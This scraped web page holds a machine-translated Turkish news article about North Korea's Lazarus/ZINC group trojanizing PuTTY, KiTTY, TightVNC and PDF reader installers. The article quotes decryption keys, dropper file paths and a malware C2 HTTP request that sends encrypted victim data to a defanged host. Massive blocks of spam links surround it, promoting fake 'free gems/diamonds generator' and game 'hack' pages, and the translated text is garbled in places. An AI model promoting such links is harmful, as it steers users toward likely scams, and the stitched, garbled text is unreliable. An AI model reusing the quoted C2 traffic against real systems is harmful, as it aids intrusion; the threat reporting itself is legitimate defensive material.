https://kumu.io/trucojuegos/nuevo-generador-de-seguidores-en-tiktok-gratis-para-ios-y-android https://kumu.io/trucojuegos/1000-seguidores-en-tiktok-gratis-para-ios-y-android-asd98s9dffdhgfh https://kumu.io/diamantesfreefire/diamantes-para-free-fire-gratis-rapido-y-real-2025-apk https://kumu.io/diamantesfreefire/como-se-gana-diamantes-gratis-free-fire-para-ios-y-android-2025 https://kumu.io/diamantesfreefire/real5600-diamantes-free-fire-gratis-hack-ios-y-android https://kumu.io/diamantesfreefire/real-diamantes-gratis-free-fire-hack-para-ios-y-android-max https://nothingbuttop10.bandcamp.com/album/kumu-descargar-free-fire-max-9999 https://hackmd.io/@b5KLTCE3RViedJhnKQZl-Q/BkXRYaSPlg https://lichess.org/team/nuevo-1000-seguidores-en-tiktok-gratis-para-ios-y-android https://lichess.org/team/nuevo-generador-de-seguidores-en-tiktok-gratis-ios-android https://lichess.org/team/metodo-5600-diamantes-free-fire-gratis-para-ios-y-android https://lichess.org/team/approved-cod-mobile-free-cp-ios--android-no-verification https://lichess.org/team/latest-free-cod-mobile-cp-for-ios--android-unlimited https://lichess.org/team/claimcp-free--cod-mobile-free-cp-ios-android https://nothingbuttop10.bandcamp.com/album/lichess-cod-mobile-cp https://linktr.ee/diamanten_gratis_chapters https://reach.link/gratis-diamanten-bei-chapters https://kumu.io/gratisdiamantenbeichapters/neueste-gratis-diamanten-bei-chapters-hack-auf-deutsch-ios-android https://kumu.io/gratisdiamantenbeichapters/unendlich-diamanten-bei-chapters-cheats-auf-deutsch https://www.weareplaystation.fr/communautes/jeux-independants/astuces/wiki/nouveau-liens-des-gratuits-monopoly-go-ios-android-du-juillet-29-2025 https://www.weareplaystation.fr/communautes/jeux-independants/astuces/wiki/astuce-monopoly-go-triche-generateur-de-des-gratuit-pour-ios-et-android-en-ligne-99sdf https://nothingbuttop10.bandcamp.com/album/9999-links-lets-go https://aetherhub.com/Tourney/RoundTourney/67327 https://aetherhub.com/Tourney/RoundTourney/67333 https://aetherhub.com/Tourney/RoundTourney/67334 https://aetherhub.com/Tourney/RoundTourney/67335 https://aetherhub.com/Tourney/RoundTourney/67336 https://aetherhub.com/Tourney/RoundTourney/67337 https://aetherhub.com/Tourney/RoundTourney/67338 https://aetherhub.com/Tourney/RoundTourney/67339 https://aetherhub.com/Tourney/RoundTourney/67340 https://aetherhub.com/Tourney/RoundTourney/67341 https://nothingbuttop10.bandcamp.com/album/tik-ff-outbound-links https://aetherhub.com/Tourney/RoundTourney/67640 https://aetherhub.com/Tourney/RoundTourney/67654 https://aetherhub.com/Tourney/RoundTourney/67655 https://aetherhub.com/Tourney/RoundTourney/67656 https://aetherhub.com/Tourney/RoundTourney/67657 https://aetherhub.com/Tourney/RoundTourney/67658 https://aetherhub.com/Tourney/RoundTourney/67659 https://aetherhub.com/Tourney/RoundTourney/67660 https://aetherhub.com/Tourney/RoundTourney/67661 https://aetherhub.com/Tourney/RoundTourney/67663 https://aetherhub.com/Tourney/RoundTourney/67669 https://aetherhub.com/Tourney/RoundTourney/67673 https://aetherhub.com/Tourney/RoundTourney/67640/?generator9 https://aetherhub.com/Tourney/RoundTourney/67654/?generator8 https://aetherhub.com/Tourney/RoundTourney/67655/?generator7 https://aetherhub.com/Tourney/RoundTourney/67656/?generator6 https://aetherhub.com/Tourney/RoundTourney/67657/?generator5 https://aetherhub.com/Tourney/RoundTourney/67658/?generator4 https://aetherhub.com/Tourney/RoundTourney/67659/?generator3 https://aetherhub.com/Tourney/RoundTourney/67660/?generator2 https://aetherhub.com/Tourney/RoundTourney/67661/?generator1 https://aetherhub.com/Tourney/RoundTourney/67663/?generator22 https://aetherhub.com/Tourney/RoundTourney/67669/?generator11 https://aetherhub.com/Tourney/RoundTourney/67673/?generator33 https://nothingbuttop10.bandcamp.com/album/aether-bonus-obl-999 https://paddling.com/paddle/trips/greatness-pubg-mobile-free-uc-bp-for-ios-android-pubg-mobile-unlimited-uc-generator-999k https://paddling.com/paddle/trips/yes-clash-of-clans-free-gems-ios-android-clash-of-clans-unlimited-gems-generator-updated-999k https://paddling.com/paddle/trips/wow-stumble-guys-free-gems-ios-android-stumble-guys-free-gems-generator-updated-999k https://paddling.com/paddle/trips/glitch-brawl-stars-free-gems-ios-android-brawl-stars-unlimited-gems-generator-updated-9999k https://paddling.com/paddle/trips/claim-apex-legends-free-coins-ios-android-apex-legends-coins-generator-updated-9999k https://paddling.com/paddle/trips/approved-dragon-city-free-gems-ios-android-dragon-city-unlimited-gems-updated-cheats https://paddling.com/paddle/trips/latest-bigo-live-free-diamonds-ios-android-bigo-live-diamonds-generator-unlimited-beans https://paddling.com/paddle/trips/greatness-pubg-mobile-free-uc-bp-for-ios-android-pubg-mobile-unlimited-uc-generator-999k/?adr https://paddling.com/paddle/trips/yes-clash-of-clans-free-gems-ios-android-clash-of-clans-unlimited-gems-generator-updated-999k/?wdf https://paddling.com/paddle/trips/wow-stumble-guys-free-gems-ios-android-stumble-guys-free-gems-generator-updated-999k/?asdc https://paddling.com/paddle/trips/glitch-brawl-stars-free-gems-ios-android-brawl-stars-unlimited-gems-generator-updated-9999k/?dwuq https://paddling.com/paddle/trips/claim-apex-legends-free-coins-ios-android-apex-legends-coins-generator-updated-9999k/?dfur https://paddling.com/paddle/trips/approved-dragon-city-free-gems-ios-android-dragon-city-unlimited-gems-updated-cheats/?sdfi https://paddling.com/paddle/trips/latest-bigo-live-free-diamonds-ios-android-bigo-live-diamonds-generator-unlimited-beans/?asfiu https://nothingbuttop10.bandcamp.com/album/latest-paddling-outbound-links

Thu. Jul 31st, 2025
Silahlı açık kaynak uygulamaları yükledikten sonra çok sayıda kuruluş saldırıya uğradı

Getty Resimleri

Microsoft Perşembe günü yaptığı açıklamada, Kuzey Kore hükümeti tarafından desteklenen bilgisayar korsanlarının, medya, savunma ve havacılık ve BT hizmetleri sektörlerinde “sayısız” kuruluştan ödün vermeyi başaran devam eden bir kampanyada iyi bilinen açık kaynaklı yazılım parçalarını silahlandırdığını söyledi.

ZINC—Microsoft’un aynı zamanda Lazarus olarak da adlandırılan ve en çok Sony Pictures Entertainment’ın yıkıcı 2014 uzlaşmasını yürütmekle tanınan bir tehdit aktörü grubuna verdiği ad, PuTTY ve diğer meşru açık kaynaklı uygulamaları, en sonunda casusluk kötü amaçlı yazılımları yükleyen yüksek düzeyde şifrelenmiş kodlarla bağlamaktadır.

Bilgisayar korsanları daha sonra iş arayanlar olarak poz veriyor ve LinkedIn üzerinden hedeflenen kuruluşların bireyleri ile bağlantı kuruyor. Bilgisayar korsanları, bir dizi konuşma üzerinde bir güven düzeyi geliştirdikten ve sonunda onları WhatsApp messenger’a taşıdıktan sonra, bireylere çalışanların çalışma ortamlarına bulaşan uygulamaları yüklemeleri talimatını verir.

Microsoft

Microsoft Güvenlik Tehdit İstihbaratı ve LinkedIn Tehdit Önleme ve Savunma ekiplerinin üyeleri bir gönderide, “Aktörler, Haziran 2022’den bu yana çok sayıda kuruluşu başarıyla tehlikeye attı.” “ZINC’in bu kampanyada kullandığı platformların ve yazılımların geniş kullanımı nedeniyle, ZINC, birden fazla sektör ve bölgede bireyler ve kuruluşlar için önemli bir tehdit oluşturabilir.”

PuTTY, SSH, SCP, Telnet, rlogin ve ham soket bağlantısı dahil olmak üzere ağ protokollerini destekleyen popüler bir terminal öykünücüsü, seri konsol ve ağ dosya aktarım uygulamasıdır. İki hafta önce güvenlik firması Mandiant, Kuzey Kore ile bağları olan bilgisayar korsanlarının, bir müşterinin ağını başarıyla tehlikeye atan bir kampanyada onu Truva atı haline getirdiği konusunda uyardı. Perşembe günkü gönderi, aynı bilgisayar korsanlarının KiTTY, TightVNC, Sumatra PDF Reader ve muPDF/Subliminal Recording yazılımını, Microsoft’un ZetaNile adını verdiği aynı casus kötü amaçlı yazılımı yükleyen kodla silahlandırdığını söyledi.

Lazarus, bir zamanlar sadece marjinal kaynaklara ve becerilere sahip bir korsan grubuydu. Son on yılda, cesareti önemli ölçüde arttı. Son beş yılda kripto para borsalarına yönelik saldırıları, ülkenin kitle imha silahları programları için milyarlarca dolar üretti. Düzenli olarak yoğun şekilde güçlendirilmiş uygulamalardaki sıfırıncı gün güvenlik açıklarını bulup kullanırlar ve diğer devlet destekli gruplar tarafından kullanılan aynı kötü amaçlı yazılım tekniklerinin çoğunu kullanırlar.

Grup, kurbanlarına ilk vektör olarak öncelikli olarak hedef odaklı kimlik avına güveniyor, ancak zaman zaman diğer sosyal mühendislik biçimlerini ve web sitesi tavizlerini de kullanıyor. Ortak bir tema, üyelerin ödün vermek istedikleri kuruluşların çalışanlarını, genellikle onları Truva atlı yazılım yüklemeye zorlayarak veya onları kandırarak hedef almalarıdır.

Microsoft’un gözlemlediği Truva Atlı PuTTY ve KiTTY uygulamaları, yalnızca amaçlanan hedeflere virüs bulaşmasını ve yanlışlıkla başkalarına bulaşmamasını sağlamak için akıllı bir mekanizma kullanıyor. Uygulama yükleyicileri herhangi bir kötü amaçlı kod yürütmez. Bunun yerine, ZetaNile kötü amaçlı yazılımı yalnızca uygulamalar belirli bir IP adresine bağlandığında ve sahte işe alım görevlilerinin hedeflere verdiği oturum açma bilgilerini kullandığında yüklenir.

Truva Atılaştırılan PuTTY yürütülebilir dosyası, komut ve kontrol olarak kullanılmak üzere “0CE1241A44557AA438F27BC6D4ACA246” anahtarıyla sunulduğunda ikinci aşamalı bir yükü yükleyen ve şifresini çözen DLL arama emri kaçırma adı verilen bir teknik kullanır. C2 sunucusuna başarılı bir şekilde bağlandıktan sonra saldırganlar, güvenliği ihlal edilen cihaza ek kötü amaçlı yazılım yükleyebilir. KiTTY uygulaması da benzer şekilde çalışır.

Benzer şekilde, kötü niyetli TightVNC Görüntüleyici, son yükünü yalnızca kullanıcı ec2-aet-tech.w-ada’yı seçtiğinde yükler.[.]TightVNC Viewer’da önceden doldurulmuş uzak ana bilgisayarların açılır menüsünden amazonaw’lar.

Microsoft

Perşembe günkü yazısının devamı:

SecurePDF.exe adlı Sumatra PDF Reader’ın truva atlı sürümü, en az 2019’dan beri ZINC tarafından kullanılmaktadır ve benzersiz bir ZINC ticari aracı olmaya devam etmektedir. SecurePDF.exe, .PDF uzantılı silahlı bir iş uygulaması temalı dosya yükleyerek ZetaNile implantını yükleyebilen modülerleştirilmiş bir yükleyicidir. Sahte PDF, bir “SPV005” başlığı, bir şifre çözme anahtarı, şifreli ikinci aşama implant yükü ve dosya açıldığında Sumatra PDF Okuyucusunda görüntülenen şifreli sahte PDF içerir.

Belleğe yüklendikten sonra, ikinci aşama kötü amaçlı yazılım, kurbanın sistem ana bilgisayar adını ve cihaz bilgilerini özel kodlama algoritmalarını kullanarak C2 check-in işleminin bir parçası olarak bir C2 iletişim sunucusuna gönderecek şekilde yapılandırılır. Saldırganlar, gerektiğinde C2 iletişimini kullanarak güvenliği ihlal edilmiş cihazlara ek kötü amaçlı yazılım yükleyebilir.

Microsoft

Yazı şöyle devam etti:

muPDF/Subliminal Recording yükleyicisinin truva atlı sürümünde, setup.exe dosya yolunun olup olmadığını kontrol etmek için yapılandırılmış ISSetupÖnkoşullar\Setup64.exe var ve yaz C:\colrctl\colorui.dll içindeki gömülü yürütülebilir dosyayı çıkardıktan sonra diskte setup.exe. Daha sonra kopyalar C:\Windows\System32\ColorCpl.exe ile C:\ColorCtrl\ColorCpl.exe. İkinci aşama kötü amaçlı yazılım için kötü amaçlı yükleyici yeni bir süreç oluşturur C:\colorctrl\colorcpl.exe C3A9B30B6A313F289297C9A36730DB6Dve argüman C3A9B30B6A313F289297C9A36730DB6D geçer colorui.dll şifre çözme anahtarı olarak. DLL colorui.dll, Microsoft’un EventHorizon kötü amaçlı yazılım ailesi olarak izlediği, C:\Windows\Sistem\credwiz.exe veya iexpress.exe kurban check-in sürecinin bir parçası olarak C2 HTTP istekleri göndermek ve ek bir yük almak için.

POST /support/support.asp HTTP/1.1
Cache-Control: no-cache
Connection: close
Content-Type: application/x-www-form-urlencoded
Accept: */*
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64;
Trident/4.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729;
InfoPath.3; .NET4.0C; .NET4.0E)
Content-Length: 125
Host: www.elite4print[.]com

bbs=[encrypted payload]= &makale=[encrypted payload]

Gönderi, kuruluşların ağlarındaki herhangi bir uç noktaya virüs bulaşıp bulaşmadığını belirlemek için arayabilecekleri teknik göstergeler sağlar. Ayrıca, yöneticilerin ağ engelleme listelerine ekleyebilecekleri kampanyada kullanılan IP adreslerini de içerir.

By admin

https://paddling.com/paddle/trips/latest-free-imvu-credits-generator-for-ios-android-no-apk-unlimited-imvu-credits-free https://paddling.com/paddle/trips/approved-how-to-get-free-diamonds-in-free-fire-ios-android-free-fire-diamond-generator-c98dsg https://paddling.com/paddle/trips/codesarchero-free-gems-generator-for-ios-android-redeem-codes-archero-2-cheats-unlimited-gems https://paddling.com/paddle/trips/999chapters-interactive-stories-free-diamonds-tickets-ios-android-chapters-hack-free-diamonds https://paddling.com/paddle/trips/999kfree-episode-gems-and-passes-ios-android-episode-gems-passes-generator-hack-998ds https://paddling.com/paddle/trips/latest-free-stumble-guys-gems-generator-for-ios-android-stumble-guys-hack-ios-no-apk-8dsg https://nothingbuttop10.bandcamp.com/album/paddling-gaming-9888 https://linktr.ee/cartecadeauxboxlivegratuit https://reach.link/carte-cadeau-xboxlive-gratuits https://kumu.io/codexboxlivegratuit/nouveaucarte-cadeau-xbox-live-gratuit-en-ligne https://kumu.io/codexboxlivegratuit/methode-code-xbox-live-gratuits-code-xbox-live-gold-gratuites-en-ligne https://nothingbuttop10.bandcamp.com/album/cartecadeau-xbox-live-gold-en-ligne https://www.dogomania.com/forum/topic/374282-%F0%9F%8E%B2-monopoly-go-hack-%E2%80%93-gratis-w%C3%BCrfel-ohne-anmeldung-sichern-ios-und-android/ https://www.dogomania.com/forum/topic/374283-neueste-so-bekommst-du-gratis-w%C3%BCrfel-monopoly-go-hack-auf-deutsch-ios-und-android-99999k/ https://www.dogomania.com/forum/topic/374284-degratis-w%C3%BCrfel-und-kostenlose-w%C3%BCrfel-links-august-2025-monopoly-go-hack-deutsch-heute-ios-android/ https://www.dogomania.com/forum/topic/374279-nuovo-come-avere-dadi-gratis-su-monopoly-go-hack-italian-dadi-gratis-infinite-per-ios-e-android-8c90sag/ https://www.dogomania.com/forum/topic/374280-100-dadi-monopoli-go-trucchi-come-ottenere-dadi-gratis-link-luglio-2025-per-ios-e-android-998dsfdsg/ https://www.dogomania.com/forum/topic/374281-trucchi-link-dadi-monopoly-go-gratis-hack-telegram-reddit-facebook-per-ios-e-android-~-9999k/ https://paddling.com/paddle/trips/latest-cod-mobile-free-cp-ios-android-how-to-get-free-cod-points-for-call-of-duty-mobile https://paddling.com/paddle/trips/latest-cod-mobile-free-cp-ios-android-how-to-get-free-cod-points-for-call-of-duty-mobile-2 https://aetherhub.com/Tourney/RoundTourney/66772 https://aetherhub.com/Tourney/RoundTourney/66775 https://aetherhub.com/Tourney/RoundTourney/66796 https://aetherhub.com/Tourney/RoundTourney/66797 https://aetherhub.com/Tourney/RoundTourney/66799 https://aetherhub.com/Tourney/RoundTourney/66802 https://aetherhub.com/Tourney/RoundTourney/66804 https://aetherhub.com/Tourney/RoundTourney/66805 https://aetherhub.com/Tourney/RoundTourney/66806 https://aetherhub.com/Tourney/RoundTourney/66807 https://aetherhub.com/Tourney/RoundTourney/66808 https://aetherhub.com/Tourney/RoundTourney/66809 https://aetherhub.com/Tourney/RoundTourney/66810 https://aetherhub.com/Tourney/RoundTourney/66811 https://nothingbuttop10.bandcamp.com/album/aetherde-2025 https://aetherhub.com/Tourney/RoundTourney/66828 https://aetherhub.com/Tourney/RoundTourney/66833 https://aetherhub.com/Tourney/RoundTourney/66834 https://aetherhub.com/Tourney/RoundTourney/66835 https://paddling.com/paddle/trips/updatedcod-mobile-free-cp-generator-ios-android-9999k-no-verification-9999k https://paddling.com/paddle/trips/redeemcall-of-duty-mobile-free-cp-ios-android-unlimited-cod-points-hack-2025-9999k https://paddling.com/paddle/trips/latest-free-cod-mobile-free-cp-android-apk-unlimited-cod-points-for-call-of-duty-mobile https://paddling.com/paddle/trips/crazy-call-of-duty-mobile-free-cod-points-cp-for-ios-android-updated-9999k https://nothingbuttop10.bandcamp.com/album/paddling-gaming-outbound-cod-links https://paddling.com/paddle/trips/newestepisode-unlimited-passes-and-gems-generator-for-ios-android-episode-choose-your-story-hacks https://paddling.com/paddle/trips/episode-free-gems-and-passes-ios-android-how-to-get-unlimited-gems-passes-for-episode-free https://paddling.com/paddle/trips/latest-episode-gems-and-passes-generator-ios-android-updated-9999k-unlimited https://paddling.com/paddle/trips/new-chapters-interactive-stories-free-diamonds-generator-ios-android-cheat-codes https://paddling.com/paddle/trips/999k-chapters-unlimited-diamonds-and-tickets-ios-android-free-999k https://paddling.com/paddle/trips/realchapters-mod-apk-unlimited-tickets-and-diamonds-for-android-ios-updated-link https://paddling.com/paddle/trips/match-masters-free-coins-hack-cheats-for-match-masters-ios-android-app-free-gift-links-today https://paddling.com/paddle/trips/latest-match-masters-free-coins-booster-links-match-masters-free-gifts-daily-generator-ios-android https://paddling.com/paddle/trips/booster-match-masters-free-coins-ios-android-updated-links-free-unlimited-coins-match-masters-gifts https://nothingbuttop10.bandcamp.com/album/holloplays-outbound-links